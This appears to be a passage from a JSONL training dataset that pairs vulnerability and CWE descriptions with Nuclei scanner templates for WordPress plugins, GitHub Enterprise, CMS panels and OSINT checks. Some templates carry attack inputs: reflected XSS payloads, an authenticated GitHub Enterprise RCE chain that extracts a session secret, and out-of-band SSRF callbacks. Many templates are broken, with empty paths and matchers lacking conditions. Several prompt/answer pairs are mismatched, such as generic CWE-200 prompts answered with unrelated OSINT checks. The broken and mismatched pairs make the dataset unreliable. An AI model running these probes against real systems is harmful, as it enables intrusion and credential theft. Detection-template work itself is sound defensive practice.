"category": "cve", "severity": "medium", "id": "CVE-2023-0676"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: cadvisor-exposure\n\ninfo:\n name: cAdvisor - Detect\n author: DhiyaneshDk\n severity: medium\n description: cAdvisor page was detected.\n tags: exposure,misconfig,dashboard,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/containers/\" \n matchers:\n - type: word\n words:\n - \"cAdvisor - /\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: WP AutoSuggest 0.24 - SQL Injection", "input": "Title: WP AutoSuggest 0.24 - SQL Injection\nSummary: WP AutoSuggest 0.24 - SQL Injection. The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: wp-autosuggest-sql-injection\n\ninfo:\n name: WP AutoSuggest 0.24 - SQL Injection\n author: theamanrawat\n severity: critical\n description: The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.\n tags: time-based-sqli,wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "critical", "id": "wp-autosuggest-sql-injection"} {"instruction": "Generate a Nuclei template for CVE-2024-0200", "input": "Title: Vulnerability (CWE-470) in github enterprise_server\nSummary: An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability\u00a0could lead to the execution of user-controlled methods and remote code execution. To\u00a0exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role.\u00a0This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. This vulnerability was reported via the GitHub Bug Bounty program.\n\n\nVulnerability Type: Vulnerability (CWE-470)\nSeverity: high\nAffected Products: github enterprise_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-0200\n\ninfo:\n name: Github Enterprise Authenticated Remote Code Execution\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n tags: cve,cve2024,rce,github,enterprise,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v3/user/orgs\" \n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n - \"{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}\" \n matchers:\n - type: word\n words:\n - \"\"role\": \"admin\"\" \n part: body\n - method: POST\n path:\n - \"{{BaseURL}}/api/v3/orgs/{{org_name}}/repos\" \n matchers:\n - type: status\n status:\n - 201\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: status\n status:\n - 200\n - method: POST\n path:\n - \"{{BaseURL}}/session\" \n matchers:\n - type: status\n status:\n - 302\n - type: word\n words:\n - \"_gh_render\" \n part: header\n - method: GET\n path:\n - \"{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck\" \n matchers:\n - type: word\n words:\n - \"ENTERPRISE_SESSION_SECRET\" \n part: body\n - method: GET\n path:\n - \"{{BaseURL}}/\" \n matchers:\n - type: status\n status:\n - 500\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol", "category": "cve", "severity": "high", "id": "CVE-2024-0200"} {"instruction": "Generate a Nuclei template for CVE-2015-6477", "input": "Title: Cross-Site Scripting (XSS) in nordex nordex_control_2_scada\nSummary: Multiple cross-site scripting (XSS) vulnerabilities in the Wind Farm Portal application in Nordex Control 2 (NC2) SCADA 16 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: nordex nordex_control_2_scada\nIndicators: error, vulnerability detected", "output": "id: CVE-2015-6477\n\ninfo:\n name: Nordex NC2 - Cross-Site Scripting\n author: geeknik,daffainfo\n severity: medium\n description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve,cve2015,nordex,nc2,seclists,packetstorm,xss,iot,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: word\n words:\n - \"\" \n - \"var detailParams\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2015-6477"} {"instruction": "Generate a Nuclei template to detect Confused Deputy", "input": "Title: Confused Deputy (CWE-441)\nSummary: The product receives a request, message, or directive from an upstream component, but the product does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the product's control sphere. This causes the product to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor. If an attacker cannot directly contact a target, but the produc\nVulnerability Type: Confused Deputy\nSeverity: medium\nIndicators: unexpected", "output": "id: metadata-service-azure\n\ninfo:\n name: Microsoft Azure Cloud Metadata Service Check\n author: sullo\n severity: critical\n description: The Microsoft Azure cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.\n tags: exposure,config,azure,microsoft,proxy,misconfig,metadata,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"osType\" \n - \"ipAddress\" \n part: body\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-441"} {"instruction": "Generate a Nuclei template for: Compalex Panel - Detect", "input": "Title: Compalex Panel - Detect\nSummary: Compalex Panel - Detect. Tags: tech, php, compalex\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: compalex-panel-detect\n\ninfo:\n name: Compalex Panel - Detect\n author: MaStErCho\n severity: medium\n description: Compalex Panel - Detect\n tags: tech,php,compalex,sql,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/{{paths}}/\" \n - \"{{paths}}.{{BaseURL}}/\" \n matchers:\n - type: word\n words:\n - \"COMPALEX\" \n - \"<h1>Compalex\" \n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "compalex-panel-detect"} {"instruction": "Generate a Nuclei template for: WooPayments' Integrated WooCommerce Payments Detection", "input": "Title: WooPayments' Integrated WooCommerce Payments Detection\nSummary: WooPayments' Integrated WooCommerce Payments Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-woocommerce-payments\n\ninfo:\n name: WooPayments' Integrated WooCommerce Payments Detection\n author: ricardomaia\n severity: info\n description: WooPayments' Integrated WooCommerce Payments Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/woocommerce-payments/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-woocommerce-payments"} {"instruction": "Generate a Nuclei template for: Max-Forwards Header - Detect", "input": "Title: Max-Forwards Header - Detect\nSummary: Max-Forwards Header - Detect. Max-Forwards response header is specified.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: maxforwards-headers-detect\n\ninfo:\n name: Max-Forwards Header - Detect\n author: righettod\n severity: info\n description: Max-Forwards response header is specified.\n tags: miscellaneous,misc,max-forwards,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl", "category": "generic", "severity": "info", "id": "maxforwards-headers-detect"} {"instruction": "Generate a Nuclei template for CVE-2017-18024", "input": "Title: Cross-Site Scripting (XSS) in avantfax avantfax\nSummary: AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: avantfax avantfax\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-18024\n\ninfo:\n name: AvantFAX 3.3.3 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.\n tags: cve,cve2017,avantfax,hackerone,packetstorm,xss,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"<script>alert(\"{{randstr}}\")</script>\" \n - \"AvantFAX\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2017-18024"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: opencart-panel\n\ninfo:\n name: OpenCart Login Panel - Detect\n author: ricardomaia\n severity: info\n description: OpenCart login panel was detected.\n tags: panel,opencart,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin\" \n - \"{{BaseURL}}/index.php?route=account/login\" \n matchers:\n - type: regex\n condition: or", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: fanpop\n\ninfo:\n name: Fanpop User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Fanpop user name information check was conducted.\n tags: osint,osint-social,fanpop,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.fanpop.com/fans/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Fanpopping since\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Mythic C2 SSL - Detect", "input": "Title: Mythic C2 SSL - Detect\nSummary: Mythic C2 SSL - Detect. Mythic is a multiplayer, command and control platform for red teaming operations\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: mythic-c2-ssl\n\ninfo:\n name: Mythic C2 SSL - Detect\n author: johnk3r\n severity: info\n description: Mythic is a multiplayer, command and control platform for red teaming operations\n tags: c2,ssl,tls,ir,osint,malware,mythic,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "mythic-c2-ssl"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: zatrybipl\n\ninfo:\n name: Zatrybi.pl User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Zatrybi.pl user name information check was conducted.\n tags: osint,osint-tech,zatrybipl,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://zatrybi.pl/user/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Zarejestrowany od:\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-4306", "input": "Title: Unknown Vulnerability in panda_pods_repeater_field_project panda_pods_repeater_field\nSummary: The Panda Pods Repeater Field WordPress plugin before 1.5.4 does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a user having at least Contributor permission.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: panda_pods_repeater_field_project panda_pods_repeater_field\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-4306\n\ninfo:\n name: WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks.\n tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated,panda_pods_repeater_field_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2022-4306"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: 3g-wireless-gateway\n\ninfo:\n name: 3G Wireless Gateway Detection\n author: pussycat0x\n severity: info\n description: A 3G wireless gateway was detected.\n tags: panel,router,edb,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/htmlcode/html/indexdefault.asp\" \n matchers:\n - type: word\n words:\n - \"g_i3gState\" \n - \"g_sysinfo_sim_state\" \n - \"g_iUID\" \n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Command Injection", "input": "Title: Command Injection (CWE-77)\nSummary: The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attac\nVulnerability Type: Command Injection\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: apache-flink-unauth-rce\n\ninfo:\n name: Apache Flink - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: Apache Flink contains an unauthenticated remote code execution vulnerability.\n tags: apache,flink,rce,intrusive,unauth,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"application/json\" \n part: header\n condition: and\n - type: word\n words:\n - \"success\" \n - \"_poc.jar\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-77"} {"instruction": "Generate a Nuclei template for CVE-2021-24947", "input": "Title: Vulnerability (CWE-863) in thinkupthemes responsive_vector_maps\nSummary: The RVM WordPress plugin before 6.4.2 does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server\nVulnerability Type: Vulnerability (CWE-863)\nSeverity: medium\nAffected Products: thinkupthemes responsive_vector_maps\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24947\n\ninfo:\n name: WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read\n author: cckuailong\n severity: medium\n description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.\n tags: cve2021,cve,authenticated,wpscan,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24947"} {"instruction": "Generate a Nuclei template for: System Properties Exposure", "input": "Title: System Properties Exposure\nSummary: System Properties Exposure. System Properties is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: system-properties-exposure\n\ninfo:\n name: System Properties Exposure\n author: DhiyaneshDk\n severity: low\n description: System Properties is exposed.\n tags: misconfig,system,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"System Properties:\" \n - \"Environment Variables:\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "system-properties-exposure"} {"instruction": "Generate a Nuclei template for: CMS Made Simple Installation Page - Exposure", "input": "Title: CMS Made Simple Installation Page - Exposure\nSummary: CMS Made Simple Installation Page - Exposure. Detects exposed CMS Made Simple Installation page.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: cms-made-simple-installer\n\ninfo:\n name: CMS Made Simple Installation Page - Exposure\n author: DhiyaneshDK\n severity: high\n description: Detects exposed CMS Made Simple Installation page.\n tags: misconfig,install,exposure,cms-made-simple,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install/\" \n matchers:\n - type: word\n words:\n - \"CMS Made Simple Install/Upgrade\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "cms-made-simple-installer"} {"instruction": "Generate a Nuclei template for CVE-2023-27163", "input": "Title: Vulnerability (CWE-918) in rbaskets request_baskets\nSummary: request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: medium\nAffected Products: rbaskets request_baskets\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-27163\n\ninfo:\n name: Request-Baskets <= 1.2.1 - Server Side Request Forgery\n author: Jaenact\n severity: medium\n description: Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.\n tags: cve,cve2023,ssrf,request-baskets,oast,proxy,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol", "category": "cve", "severity": "medium", "id": "CVE-2023-27163"} {"instruction": "Generate a Nuclei template for: Ninja Forms \u2013 The Contact Form Builder That Grows With You Detection", "input": "Title: Ninja Forms \u2013 The Contact Form Builder That Grows With You Detection\nSummary: Ninja Forms \u2013 The Contact Form Builder That Grows With You Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-ninja-forms\n\ninfo:\n name: Ninja Forms \u2013 The Contact Form Builder That Grows With You Detection\n author: ricardomaia\n severity: info\n description: Ninja Forms \u2013 The Contact Form Builder That Grows With You Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-ninja-forms"} {"instruction": "Generate a Nuclei template for: Khodrochi CMS - Cross Site Scripting", "input": "Title: Khodrochi CMS - Cross Site Scripting\nSummary: Khodrochi CMS - Cross Site Scripting. A cross site scripting vulnerability was found in the Khodrochi.ir CMS an Iranian Car Services Platform.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: khodrochi-cms-xss\n\ninfo:\n name: Khodrochi CMS - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: A cross site scripting vulnerability was found in the Khodrochi.ir CMS an Iranian Car Services Platform.\n tags: khodrochi,cms,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/specification/report.php?q=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "medium", "id": "khodrochi-cms-xss"} {"instruction": "Generate a Nuclei template for: FreeScout Panel - Detect", "input": "Title: FreeScout Panel - Detect\nSummary: FreeScout Panel - Detect. FreeScout panel was discovered.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: freescout-panel\n\ninfo:\n name: FreeScout Panel - Detect\n author: s4e-io\n severity: info\n description: FreeScout panel was discovered.\n tags: panel,login,freescout,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "freescout-panel"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: netvibes\n\ninfo:\n name: Netvibes User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Netvibes user name information check was conducted.\n tags: osint,osint-social,netvibes,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.netvibes.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"userId\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Thruk Security Checks", "input": "Title: Thruk Security Checks\nSummary: Thruk Security Checks. A simple workflow that runs all Thruk related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: thruk-workflow\n\ninfo:\n name: Thruk Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all Thruk related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "thruk-workflow"} {"instruction": "Generate a Nuclei template for: Breeze \u2013 WordPress Cache Plugin Detection", "input": "Title: Breeze \u2013 WordPress Cache Plugin Detection\nSummary: Breeze \u2013 WordPress Cache Plugin Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-breeze\n\ninfo:\n name: Breeze \u2013 WordPress Cache Plugin Detection\n author: ricardomaia\n severity: info\n description: Breeze \u2013 WordPress Cache Plugin Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/breeze/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-breeze"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: hybris-default-login\n\ninfo:\n name: Hybris - Default Login\n author: princechaddha\n severity: high\n description: Hybris contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.\n tags: default-login,hybris,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"hybris administration console\" \n - \"You're Administrator\" \n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template for: Phalcon Framework - Source Code Leakage", "input": "Title: Phalcon Framework - Source Code Leakage\nSummary: Phalcon Framework - Source Code Leakage. Phalcon Framework source code was discovered.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: phalcon-framework-source\n\ninfo:\n name: Phalcon Framework - Source Code Leakage\n author: philippedelteil\n severity: high\n description: Phalcon Framework source code was discovered.\n tags: exposure,debug,phalcon,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/anything_here\" \n matchers:\n - type: word\n words:\n - \"Phalcon Framework\" \n - \"AnythingHereController\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "phalcon-framework-source"} {"instruction": "Generate a Nuclei template for CVE-2018-11231", "input": "Title: SQL Injection in divido divido\nSummary: In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: divido divido\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-11231\n\ninfo:\n name: Opencart Divido - Sql Injection\n author: ritikchaddha\n severity: high\n description: OpenCart Divido plugin is susceptible to SQL injection\n tags: cve,cve2018,opencart,sqli,intrusive,divido,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"{{md5({{num}})}}\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2018-11231"} {"instruction": "Generate a Nuclei template for: Insecure Firebase Database", "input": "Title: Insecure Firebase Database\nSummary: Insecure Firebase Database. If the owner of the app have set the security rules as true for both \"read\" & \"write\" an attacker can probably dump database and write his own data to firebase database.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: insecure-firebase-database\n\ninfo:\n name: Insecure Firebase Database\n author: rafaelwdornelas\n severity: high\n description: If the owner of the app have set the security rules as true for both \"read\" & \"write\" an attacker can probably dump database and write his own data to firebase database.\n tags: firebase,google,misconfig,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"{\"id\":\"insecure-firebase-database\"}\" \n part: body_2\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "insecure-firebase-database"} {"instruction": "Generate a Nuclei template for: Jira Unauthenticated Access to screens", "input": "Title: Jira Unauthenticated Access to screens\nSummary: Jira Unauthenticated Access to screens. Tags: atlassian, jira, vuln\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: jira-unauthenticated-screens\n\ninfo:\n name: Jira Unauthenticated Access to screens\n author: TESS\n severity: info\n description: Jira Unauthenticated Access to screens\n tags: atlassian,jira,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/rest/api/2/screens\" \n matchers:\n - type: word\n words:\n - \"\"id\":\" \n - \"\"name\":\" \n - \"\"description\":\" \n condition: and\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"atlassian.xsrf.token\" \n part: header", "category": "generic", "severity": "info", "id": "jira-unauthenticated-screens"} {"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: wp-nextgen-xss\n\ninfo:\n name: WordPress NextGEN Gallery 1.9.10 - Cross-Site Scripting\n author: daffainfo\n severity: high\n description: WordPress NextGEN Gallery 1.9.10 plugin contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: wp-plugin,edb,wordpress,xss,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"= NextGEN Gallery\" \n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"</script><script>alert(document.domain)</script>\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-79"} {"instruction": "Generate a Nuclei template to detect Open Redirect", "input": "Title: Open Redirect (CWE-601)\nSummary: The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.\nVulnerability Type: Open Redirect\nSeverity: 